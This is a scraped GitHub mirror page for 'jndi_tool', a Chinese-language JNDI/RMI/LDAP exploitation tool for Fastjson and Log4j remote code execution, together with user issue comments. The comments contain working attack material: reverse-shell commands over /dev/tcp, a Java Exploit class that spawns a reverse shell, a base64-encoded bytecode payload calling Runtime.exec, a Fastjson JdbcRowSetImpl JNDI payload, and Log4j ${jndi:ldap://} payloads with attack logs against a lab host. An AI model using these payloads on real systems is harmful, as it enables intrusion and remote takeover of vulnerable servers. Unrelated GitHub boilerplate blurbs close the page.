wyzxxz / jndi_tool Goto Github PK
View Code? Open in Web Editor NEWJNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具
JNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具
HW结束了,开放下载
1.4.x版的fastjson能打吗?
java 1.8.242
当我启用RMI或者LDAP后:
java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash -i >&/dev/tcp/x.x.x.x/80 0>&1"
RMI服务显示有请求,但是nc端没有连接。当我使用其他Payload时,可以进行反弹,例如:
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/x.x.x.x/80 0>&1"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
由于您的工具已经打成了jar我,我无法分析查看。故提此issuse
打开download_url : https://toolaffix.oss-cn-beijing.aliyuncs.com/jndi_tool.zip 后直接返回oss报错界面
This XML file does not appear to have any style information associated with it. The document tree is shown below. <Error> <Code>NoSuchKey</Code> <Message>The specified key does not exist.</Message> <RequestId>61BACA8B99F00D313870123A</RequestId> <HostId>toolaffix.oss-cn-beijing.aliyuncs.com</HostId> <Key>jndi_tool.zip</Key> </Error>
执行命令:java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 "curl dnslog.wyzxxz.cn" el-win/el-linux/groovy
Exception in thread "main" java.lang.IllegalAccessError: class jndi.EvilRMIServer (in unnamed module @0x19e1023e) cannot access class com.sun.jndi.rmi.registry.ReferenceWrapper (in module jdk.naming.rmi) because module jdk.naming.rmi does not export com.sun.jndi.rmi.registry to unnamed module @0x19e1023e
at jndi.EvilRMIServer.main(EvilRMIServer.java:114)
我在执行jndi.fastjson.LDAPRefServerAuto 时存在可用类,但是显示ECHO NOT FIND,执行命令时没有回显要怎么解决?
为什么这里要请求dnslog.wyzxxz.cn
我记得之前运行ldap或者rmi的时候 会提示fastjson的payload的 现在好像没了
// jdk8\jdk7\jdk6
String []a={"Q","M","I"};
String szCode="yv66vgAAAD"+a[I]+"AHAoABgAPCgAQABEIABIKABAAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAWAQAKU291cmNlRmlsZQEAC09iamVjdC5qYXZhDAAHAAgHABcMABgAGQEADHBheWxvYWRfY29kZQwAGgAbAQAGT2JqZWN0AQAQamF2YS9sYW5nL09iamVjdAEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAABAAEABwAIAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAABQAEAAYADQAHAAsAAAAEAAEADAABAA0AAAACAA4="
Log4j 靶场漏洞检测失败
[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/
[-] LDAP Listening on 0.0.0.0:8088
[-] payload: ${jndi:ldap://82.156.13.32:8088/xobject}
[-] start exploit. waiting...
[-] exploit fail and exit.
[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/
[-] LDAP Listening on 0.0.0.0:8088
[-] payload: ${jndi:ldap://82.156.13.32:8088/xobject}
[-] start exploit. waiting...
[-] exploit fail and exit.
师傅您好,使用这条命令
java -cp fastjson_tool.jar fastjson.LDAPRefServer2 1099 CommonsCollections1 "curl dnslog.cn"
会提示
“Error: Could not find or load main class fastjson.LDAPRefServer2”
后门有没?
有些情况下需要对payload进行urlencode
vps: java -cp fastjson_tool.jar HLDAPServer localhost 1099 "bash -i >& /dev/tcp/vps/8080 0>&1"
{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://4xxx:1099/Object","autoCommit":true}}
可以执行命令,反弹的时候没收到请求,请教一下师傅
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.